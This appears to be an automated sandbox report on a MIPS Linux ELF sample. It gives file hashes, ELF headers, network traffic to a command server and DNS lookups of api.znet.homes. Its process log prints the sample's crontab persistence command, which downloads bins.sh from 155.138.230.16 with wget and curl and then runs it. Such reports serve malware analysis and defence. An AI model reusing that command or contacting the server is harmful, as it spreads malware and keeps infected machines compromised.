                                                    Preview:6267 (/tmp/mips.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2147483056 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                    Process:/tmp/mips.elf
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):114
                                                    Entropy (8bit):2.652525069330869
                                                    Encrypted:false
                                                    SSDEEP:3:i6BIPLvVBdSQhVvX:ikAvVWGf
                                                    MD5:7B54AA3F3C52B9EE5D562637785F4485
                                                    SHA1:AF2DBD2D807BDDB1317E4856DDA80EFA530D088A
                                                    SHA-256:9CF916E228D45F0D15DFF05C73695D8DEFF8C57E39B85D39821F56FC52AEF2BD
                                                    SHA-512:44CC32EFF0DCBA9C84DCBDADF043AE974F106D3BD4EA763FFA36F0C3FE57C259C84726954E176441353BD75BADB375FDBFDE42381B7C1CE21D53E7083827277C
                                                    Malicious:false
                                                    Preview:6267 (/tmp/mips.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2147483056 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                    Process:/tmp/mips.elf
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):114
                                                    Entropy (8bit):2.652525069330869
                                                    Encrypted:false
                                                    SSDEEP:3:i6BIPLvVBdSQhVvX:ikAvVWGf
                                                    MD5:7B54AA3F3C52B9EE5D562637785F4485
                                                    SHA1:AF2DBD2D807BDDB1317E4856DDA80EFA530D088A
                                                    SHA-256:9CF916E228D45F0D15DFF05C73695D8DEFF8C57E39B85D39821F56FC52AEF2BD
                                                    SHA-512:44CC32EFF0DCBA9C84DCBDADF043AE974F106D3BD4EA763FFA36F0C3FE57C259C84726954E176441353BD75BADB375FDBFDE42381B7C1CE21D53E7083827277C
                                                    Malicious:false
                                                    Preview:6267 (/tmp/mips.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2147483056 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                    Process:/tmp/mips.elf
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):114
                                                    Entropy (8bit):2.652525069330869
                                                    Encrypted:false
                                                    SSDEEP:3:i6BIPLvVBdSQhVvX:ikAvVWGf
                                                    MD5:7B54AA3F3C52B9EE5D562637785F4485
                                                    SHA1:AF2DBD2D807BDDB1317E4856DDA80EFA530D088A
                                                    SHA-256:9CF916E228D45F0D15DFF05C73695D8DEFF8C57E39B85D39821F56FC52AEF2BD
                                                    SHA-512:44CC32EFF0DCBA9C84DCBDADF043AE974F106D3BD4EA763FFA36F0C3FE57C259C84726954E176441353BD75BADB375FDBFDE42381B7C1CE21D53E7083827277C
                                                    Malicious:false
                                                    Preview:6267 (/tmp/mips.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2147483056 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                    Process:/tmp/mips.elf
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):114
                                                    Entropy (8bit):2.652525069330869
                                                    Encrypted:false
                                                    SSDEEP:3:i6BIPLvVBdSQhVvX:ikAvVWGf
                                                    MD5:7B54AA3F3C52B9EE5D562637785F4485
                                                    SHA1:AF2DBD2D807BDDB1317E4856DDA80EFA530D088A
                                                    SHA-256:9CF916E228D45F0D15DFF05C73695D8DEFF8C57E39B85D39821F56FC52AEF2BD
                                                    SHA-512:44CC32EFF0DCBA9C84DCBDADF043AE974F106D3BD4EA763FFA36F0C3FE57C259C84726954E176441353BD75BADB375FDBFDE42381B7C1CE21D53E7083827277C
                                                    Malicious:false
                                                    Preview:6267 (/tmp/mips.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2147483056 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                    Process:/tmp/mips.elf
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):114
                                                    Entropy (8bit):2.652525069330869
                                                    Encrypted:false
                                                    SSDEEP:3:i6BIPLvVBdSQhVvX:ikAvVWGf
                                                    MD5:7B54AA3F3C52B9EE5D562637785F4485
                                                    SHA1:AF2DBD2D807BDDB1317E4856DDA80EFA530D088A
                                                    SHA-256:9CF916E228D45F0D15DFF05C73695D8DEFF8C57E39B85D39821F56FC52AEF2BD
                                                    SHA-512:44CC32EFF0DCBA9C84DCBDADF043AE974F106D3BD4EA763FFA36F0C3FE57C259C84726954E176441353BD75BADB375FDBFDE42381B7C1CE21D53E7083827277C
                                                    Malicious:false
                                                    Preview:6267 (/tmp/mips.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2147483056 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                    Process:/tmp/mips.elf
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):114
                                                    Entropy (8bit):2.6459032491364525
                                                    Encrypted:false
                                                    SSDEEP:3:nFeIPLvVBdSQhVvX:kAvVWGf
                                                    MD5:1F09B80DAAF2A8612ABC0E44A076B1F5
                                                    SHA1:A51780AE40CF60ACFB0840389BB36D47EAE0FF26
                                                    SHA-256:8F6344FA0916FF29981AFDB7EBB99368BBDD69BF481A1ECC6365F46B00086A15
                                                    SHA-512:6ED8762C9CFD600381D4AD3852992D02A11A20FF65EA0CA3B1DE4020CA6527CB5421F952AA5592638AA96B79B1E83AEA3B88BC7418B6C5724EFD180AD8DA3C49
                                                    Malicious:false
                                                    Preview:6262 (/tmp/mips.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2147483056 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                    Process:/tmp/mips.elf
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):114
                                                    Entropy (8bit):2.652525069330869
                                                    Encrypted:false
                                                    SSDEEP:3:i6BIPLvVBdSQhVvX:ikAvVWGf
                                                    MD5:7B54AA3F3C52B9EE5D562637785F4485
                                                    SHA1:AF2DBD2D807BDDB1317E4856DDA80EFA530D088A
                                                    SHA-256:9CF916E228D45F0D15DFF05C73695D8DEFF8C57E39B85D39821F56FC52AEF2BD
                                                    SHA-512:44CC32EFF0DCBA9C84DCBDADF043AE974F106D3BD4EA763FFA36F0C3FE57C259C84726954E176441353BD75BADB375FDBFDE42381B7C1CE21D53E7083827277C
                                                    Malicious:false
                                                    Preview:6267 (/tmp/mips.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2147483056 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                    Process:/tmp/mips.elf
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):114
                                                    Entropy (8bit):2.652525069330869
                                                    Encrypted:false
                                                    SSDEEP:3:i6BIPLvVBdSQhVvX:ikAvVWGf
                                                    MD5:7B54AA3F3C52B9EE5D562637785F4485
                                                    SHA1:AF2DBD2D807BDDB1317E4856DDA80EFA530D088A
                                                    SHA-256:9CF916E228D45F0D15DFF05C73695D8DEFF8C57E39B85D39821F56FC52AEF2BD
                                                    SHA-512:44CC32EFF0DCBA9C84DCBDADF043AE974F106D3BD4EA763FFA36F0C3FE57C259C84726954E176441353BD75BADB375FDBFDE42381B7C1CE21D53E7083827277C
                                                    Malicious:false
                                                    Preview:6267 (/tmp/mips.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2147483056 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                    Process:/tmp/mips.elf
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):114
                                                    Entropy (8bit):2.652525069330869
                                                    Encrypted:false
                                                    SSDEEP:3:i6BIPLvVBdSQhVvX:ikAvVWGf
                                                    MD5:7B54AA3F3C52B9EE5D562637785F4485
                                                    SHA1:AF2DBD2D807BDDB1317E4856DDA80EFA530D088A
                                                    SHA-256:9CF916E228D45F0D15DFF05C73695D8DEFF8C57E39B85D39821F56FC52AEF2BD
                                                    SHA-512:44CC32EFF0DCBA9C84DCBDADF043AE974F106D3BD4EA763FFA36F0C3FE57C259C84726954E176441353BD75BADB375FDBFDE42381B7C1CE21D53E7083827277C
                                                    Malicious:false
                                                    Preview:6267 (/tmp/mips.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2147483056 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                    Process:/tmp/mips.elf
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):114
                                                    Entropy (8bit):2.652525069330869
                                                    Encrypted:false
                                                    SSDEEP:3:i6BIPLvVBdSQhVvX:ikAvVWGf
                                                    MD5:7B54AA3F3C52B9EE5D562637785F4485
                                                    SHA1:AF2DBD2D807BDDB1317E4856DDA80EFA530D088A
                                                    SHA-256:9CF916E228D45F0D15DFF05C73695D8DEFF8C57E39B85D39821F56FC52AEF2BD
                                                    SHA-512:44CC32EFF0DCBA9C84DCBDADF043AE974F106D3BD4EA763FFA36F0C3FE57C259C84726954E176441353BD75BADB375FDBFDE42381B7C1CE21D53E7083827277C
                                                    Malicious:false
                                                    Preview:6267 (/tmp/mips.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2147483056 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                    Process:/tmp/mips.elf
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):114
                                                    Entropy (8bit):2.652525069330869
                                                    Encrypted:false
                                                    SSDEEP:3:i6BIPLvVBdSQhVvX:ikAvVWGf
                                                    MD5:7B54AA3F3C52B9EE5D562637785F4485
                                                    SHA1:AF2DBD2D807BDDB1317E4856DDA80EFA530D088A
                                                    SHA-256:9CF916E228D45F0D15DFF05C73695D8DEFF8C57E39B85D39821F56FC52AEF2BD
                                                    SHA-512:44CC32EFF0DCBA9C84DCBDADF043AE974F106D3BD4EA763FFA36F0C3FE57C259C84726954E176441353BD75BADB375FDBFDE42381B7C1CE21D53E7083827277C
                                                    Malicious:false
                                                    Preview:6267 (/tmp/mips.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2147483056 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                    Process:/tmp/mips.elf
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):114
                                                    Entropy (8bit):2.652525069330869
                                                    Encrypted:false
                                                    SSDEEP:3:i6BIPLvVBdSQhVvX:ikAvVWGf
                                                    MD5:7B54AA3F3C52B9EE5D562637785F4485
                                                    SHA1:AF2DBD2D807BDDB1317E4856DDA80EFA530D088A
                                                    SHA-256:9CF916E228D45F0D15DFF05C73695D8DEFF8C57E39B85D39821F56FC52AEF2BD
                                                    SHA-512:44CC32EFF0DCBA9C84DCBDADF043AE974F106D3BD4EA763FFA36F0C3FE57C259C84726954E176441353BD75BADB375FDBFDE42381B7C1CE21D53E7083827277C
                                                    Malicious:false
                                                    Preview:6267 (/tmp/mips.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2147483056 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                    Process:/tmp/mips.elf
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):114
                                                    Entropy (8bit):2.652525069330869
                                                    Encrypted:false
                                                    SSDEEP:3:i6BIPLvVBdSQhVvX:ikAvVWGf
                                                    MD5:7B54AA3F3C52B9EE5D562637785F4485
                                                    SHA1:AF2DBD2D807BDDB1317E4856DDA80EFA530D088A
                                                    SHA-256:9CF916E228D45F0D15DFF05C73695D8DEFF8C57E39B85D39821F56FC52AEF2BD
                                                    SHA-512:44CC32EFF0DCBA9C84DCBDADF043AE974F106D3BD4EA763FFA36F0C3FE57C259C84726954E176441353BD75BADB375FDBFDE42381B7C1CE21D53E7083827277C
                                                    Malicious:false
                                                    Preview:6267 (/tmp/mips.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2147483056 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                    Process:/tmp/mips.elf
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):114
                                                    Entropy (8bit):2.652525069330869
                                                    Encrypted:false
                                                    SSDEEP:3:i6BIPLvVBdSQhVvX:ikAvVWGf
                                                    MD5:7B54AA3F3C52B9EE5D562637785F4485
                                                    SHA1:AF2DBD2D807BDDB1317E4856DDA80EFA530D088A
                                                    SHA-256:9CF916E228D45F0D15DFF05C73695D8DEFF8C57E39B85D39821F56FC52AEF2BD
                                                    SHA-512:44CC32EFF0DCBA9C84DCBDADF043AE974F106D3BD4EA763FFA36F0C3FE57C259C84726954E176441353BD75BADB375FDBFDE42381B7C1CE21D53E7083827277C
                                                    Malicious:false
                                                    Preview:6267 (/tmp/mips.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2147483056 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                    Process:/tmp/mips.elf
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):114
                                                    Entropy (8bit):2.652525069330869
                                                    Encrypted:false
                                                    SSDEEP:3:i6BIPLvVBdSQhVvX:ikAvVWGf
                                                    MD5:7B54AA3F3C52B9EE5D562637785F4485
                                                    SHA1:AF2DBD2D807BDDB1317E4856DDA80EFA530D088A
                                                    SHA-256:9CF916E228D45F0D15DFF05C73695D8DEFF8C57E39B85D39821F56FC52AEF2BD
                                                    SHA-512:44CC32EFF0DCBA9C84DCBDADF043AE974F106D3BD4EA763FFA36F0C3FE57C259C84726954E176441353BD75BADB375FDBFDE42381B7C1CE21D53E7083827277C
                                                    Malicious:false
                                                    Preview:6267 (/tmp/mips.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2147483056 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                    File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                                                    Entropy (8bit):5.549690601413307
                                                    TrID:
                                                    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                    File name:mips.elf
                                                    File size:113'188 bytes
                                                    MD5:edaaecc9d94e0b0937395cc89f86ccd5
                                                    SHA1:c8f6c51910c7653008733fa7071f9626ddc78240
                                                    SHA256:75c419a37904ca4181899cb9be322afa7cddc7d558d1c6715594deb7a8d76049
                                                    SHA512:417c406ce187ebb298efca5e57cdba706a754a6d72de0852eb2c9024cd2344d260c192775112145343fa2340d0c890f085d21b5f3cb174441ab1497cc4fd6c5d
                                                    SSDEEP:1536:ijhBRIQYhPFA0WbrtbWQwZXoLmsiQI2HEz1XxdLDszAUU:AIQYrAlr1woCscz3NscUU
                                                    TLSH:20B3961E6A618FADF29B823047F78E31966876D21BE1C580D16CDB501F203CE645FBB9
                                                    File Content Preview:.ELF.....................@.p...4...|.....4. ...(.............@...@.....p...p.................E...E.....H..n.........dt.Q............................<...'."|...!'.......................<...'."X...!........'9... ......................<...'."(...!... ....'9v

                                                    ELF header

                                                    Class:ELF32
                                                    Data:2's complement, big endian
                                                    Version:1 (current)
                                                    Machine:MIPS R3000
                                                    Version Number:0x1
                                                    Type:EXEC (Executable file)
                                                    OS/ABI:UNIX - System V
                                                    ABI Version:0
                                                    Entry Point Address:0x400270
                                                    Flags:0x1007
                                                    ELF Header Size:52
                                                    Program Header Offset:52
                                                    Program Header Size:32
                                                    Number of Program Headers:3
                                                    Section Header Offset:112508
                                                    Section Header Size:40
                                                    Number of Section Headers:17
                                                    Header String Table Index:16
                                                    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                    NULL0x00x00x00x00x0000
                                                    .initPROGBITS0x4000940x940x8c0x00x6AX004
                                                    .textPROGBITS0x4001200x1200x175500x00x6AX0016
                                                    .finiPROGBITS0x4176700x176700x5c0x00x6AX004
                                                    .rodataPROGBITS0x4176d00x176d00x1ca00x00x2A0016
                                                    .eh_framePROGBITS0x45a0000x1a0000x40x00x3WA004
                                                    .ctorsPROGBITS0x45a0040x1a0040x80x00x3WA004
                                                    .dtorsPROGBITS0x45a00c0x1a00c0x80x00x3WA004
                                                    .jcrPROGBITS0x45a0140x1a0140x40x00x3WA004
                                                    .data.rel.roPROGBITS0x45a0180x1a0180x100x00x3WA004
                                                    .dataPROGBITS0x45a0300x1a0300x2e40x00x3WA0016
                                                    .gotPROGBITS0x45a3200x1a3200x6280x40x10000003WAp0016
                                                    .sbssNOBITS0x45a9480x1a9480x140x00x10000003WAp004
                                                    .bssNOBITS0x45a9600x1a9480x65800x00x3WA0016
                                                    .commentPROGBITS0x00x1a9480xdb60x00x0001
                                                    .mdebug.abi32PROGBITS0xdb60x1b6fe0x00x00x0001
                                                    .shstrtabSTRTAB0x00x1b6fe0x7c0x00x0001
                                                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                    LOAD0x00x4000000x4000000x193700x193705.60810x5R E0x10000.init .text .fini .rodata
                                                    LOAD0x1a0000x45a0000x45a0000x9480x6ee04.43600x6RW 0x10000.eh_frame .ctors .dtors .jcr .data.rel.ro .data .got .sbss .bss
                                                    GNU_STACK0x00x00x00x00x00.00000x7RWE0x4

                                                    Download Network PCAP: filteredfull

                                                    • Total Packets: 30
                                                    • 1290 undefined
                                                    • 443 (HTTPS)
                                                    • 80 (HTTP)
                                                    • 53 (DNS)
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Mar 23, 2025 22:56:46.843693972 CET43928443192.168.2.2391.189.91.42
                                                    Mar 23, 2025 22:56:50.433914900 CET597521290192.168.2.23155.138.230.16
                                                    Mar 23, 2025 22:56:51.448801994 CET597521290192.168.2.23155.138.230.16
                                                    Mar 23, 2025 22:56:51.628253937 CET4325280192.168.2.23155.138.230.16
                                                    Mar 23, 2025 22:56:52.216696978 CET42836443192.168.2.2391.189.91.43
                                                    Mar 23, 2025 22:56:52.636687994 CET4325280192.168.2.23155.138.230.16
                                                    Mar 23, 2025 22:56:53.464514017 CET597521290192.168.2.23155.138.230.16
                                                    Mar 23, 2025 22:56:53.496515989 CET4251680192.168.2.23109.202.202.202
                                                    Mar 23, 2025 22:56:54.648360968 CET4325280192.168.2.23155.138.230.16
                                                    Mar 23, 2025 22:56:57.592016935 CET597521290192.168.2.23155.138.230.16
                                                    Mar 23, 2025 22:56:58.871794939 CET4325280192.168.2.23155.138.230.16
                                                    Mar 23, 2025 22:57:05.782830954 CET597521290192.168.2.23155.138.230.16
                                                    Mar 23, 2025 22:57:07.062728882 CET4325280192.168.2.23155.138.230.16
                                                    Mar 23, 2025 22:57:08.086534977 CET43928443192.168.2.2391.189.91.42
                                                    Mar 23, 2025 22:57:18.325131893 CET42836443192.168.2.2391.189.91.43
                                                    Mar 23, 2025 22:57:21.908646107 CET597521290192.168.2.23155.138.230.16
                                                    Mar 23, 2025 22:57:23.188570976 CET4325280192.168.2.23155.138.230.16
                                                    Mar 23, 2025 22:57:24.468322039 CET4251680192.168.2.23109.202.202.202
                                                    Mar 23, 2025 22:57:49.040972948 CET43928443192.168.2.2391.189.91.42
                                                    Mar 23, 2025 22:57:55.184124947 CET597521290192.168.2.23155.138.230.16
                                                    Mar 23, 2025 22:57:57.231920958 CET4325280192.168.2.23155.138.230.16
                                                    Mar 23, 2025 22:58:05.644453049 CET597561290192.168.2.23155.138.230.16
                                                    Mar 23, 2025 22:58:06.670533895 CET597561290192.168.2.23155.138.230.16
                                                    Mar 23, 2025 22:58:08.686280012 CET597561290192.168.2.23155.138.230.16
                                                    Mar 23, 2025 22:58:09.518286943 CET42836443192.168.2.2391.189.91.43
                                                    Mar 23, 2025 22:58:12.845798969 CET597561290192.168.2.23155.138.230.16
                                                    Mar 23, 2025 22:58:21.036585093 CET597561290192.168.2.23155.138.230.16
                                                    Mar 23, 2025 22:58:37.162383080 CET597561290192.168.2.23155.138.230.16
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Mar 23, 2025 22:56:50.312438011 CET6082853192.168.2.231.1.1.1
                                                    Mar 23, 2025 22:56:50.430982113 CET53608281.1.1.1192.168.2.23
                                                    Mar 23, 2025 22:58:05.522931099 CET4242653192.168.2.231.1.1.1
                                                    Mar 23, 2025 22:58:05.642565966 CET53424261.1.1.1192.168.2.23
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Mar 23, 2025 22:56:50.312438011 CET192.168.2.231.1.1.10xd048Standard query (0)api.znet.homesA (IP address)IN (0x0001)false
                                                    Mar 23, 2025 22:58:05.522931099 CET192.168.2.231.1.1.10x857dStandard query (0)api.znet.homesA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Mar 23, 2025 22:56:50.430982113 CET1.1.1.1192.168.2.230xd048No error (0)api.znet.homes155.138.230.16A (IP address)IN (0x0001)false
                                                    Mar 23, 2025 22:58:05.642565966 CET1.1.1.1192.168.2.230x857dNo error (0)api.znet.homes155.138.230.16A (IP address)IN (0x0001)false

                                                    System Behavior

                                                    Start time (UTC):21:56:44
                                                    Start date (UTC):23/03/2025
                                                    Path:/tmp/mips.elf
                                                    Arguments:/tmp/mips.elf
                                                    File size:5777432 bytes
                                                    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                    Start time (UTC):21:56:44
                                                    Start date (UTC):23/03/2025
                                                    Path:/tmp/mips.elf
                                                    Arguments:-
                                                    File size:5777432 bytes
                                                    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                    Start time (UTC):21:56:44
                                                    Start date (UTC):23/03/2025
                                                    Path:/tmp/mips.elf
                                                    Arguments:-
                                                    File size:5777432 bytes
                                                    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                    Start time (UTC):21:56:49
                                                    Start date (UTC):23/03/2025
                                                    Path:/tmp/mips.elf
                                                    Arguments:-
                                                    File size:5777432 bytes
                                                    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                    Start time (UTC):21:56:49
                                                    Start date (UTC):23/03/2025
                                                    Path:/tmp/mips.elf
                                                    Arguments:-
                                                    File size:5777432 bytes
                                                    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                    Start time (UTC):21:56:49
                                                    Start date (UTC):23/03/2025
                                                    Path:/tmp/mips.elf
                                                    Arguments:-
                                                    File size:5777432 bytes
                                                    MD5 hash:0083f1f0e77be34ad27f849842bbb00c

                                                    Start time (UTC):21:56:49
                                                    Start date (UTC):23/03/2025
                                                    Path:/bin/sh
                                                    Arguments:sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):21:56:49
                                                    Start date (UTC):23/03/2025
                                                    Path:/bin/sh
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):21:56:49
                                                    Start date (UTC):23/03/2025
                                                    Path:/bin/sh
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):21:56:49
                                                    Start date (UTC):23/03/2025
                                                    Path:/usr/bin/crontab
                                                    Arguments:crontab -l
                                                    File size:43720 bytes
                                                    MD5 hash:66e521d421ac9b407699061bf21806f5

                                                    Start time (UTC):21:56:50
                                                    Start date (UTC):23/03/2025
                                                    Path:/bin/sh
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):21:56:50
                                                    Start date (UTC):23/03/2025
                                                    Path:/usr/bin/chmod
                                                    Arguments:chmod +x bins.sh
                                                    File size:63864 bytes
                                                    MD5 hash:739483b900c045ae1374d6f53a86a279

                                                    Start time (UTC):21:56:50
                                                    Start date (UTC):23/03/2025
                                                    Path:/bin/sh
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):21:56:50
                                                    Start date (UTC):23/03/2025
                                                    Path:/usr/bin/sh
                                                    Arguments:sh bins.sh
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):21:56:50
                                                    Start date (UTC):23/03/2025
                                                    Path:/bin/sh
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):21:56:50
                                                    Start date (UTC):23/03/2025
                                                    Path:/bin/curl
                                                    Arguments:/bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh
                                                    File size:239848 bytes
                                                    MD5 hash:add6bc2195e82c55985ccf49fd4048e6

                                                    Start time (UTC):21:56:49
                                                    Start date (UTC):23/03/2025
                                                    Path:/bin/sh
                                                    Arguments:-
                                                    File size:129816 bytes
                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                    Start time (UTC):21:56:49
                                                    Start date (UTC):23/03/2025
                                                    Path:/usr/bin/crontab
                                                    Arguments:crontab -
                                                    File size:43720 bytes
                                                    MD5 hash:66e521d421ac9b407699061bf21806f5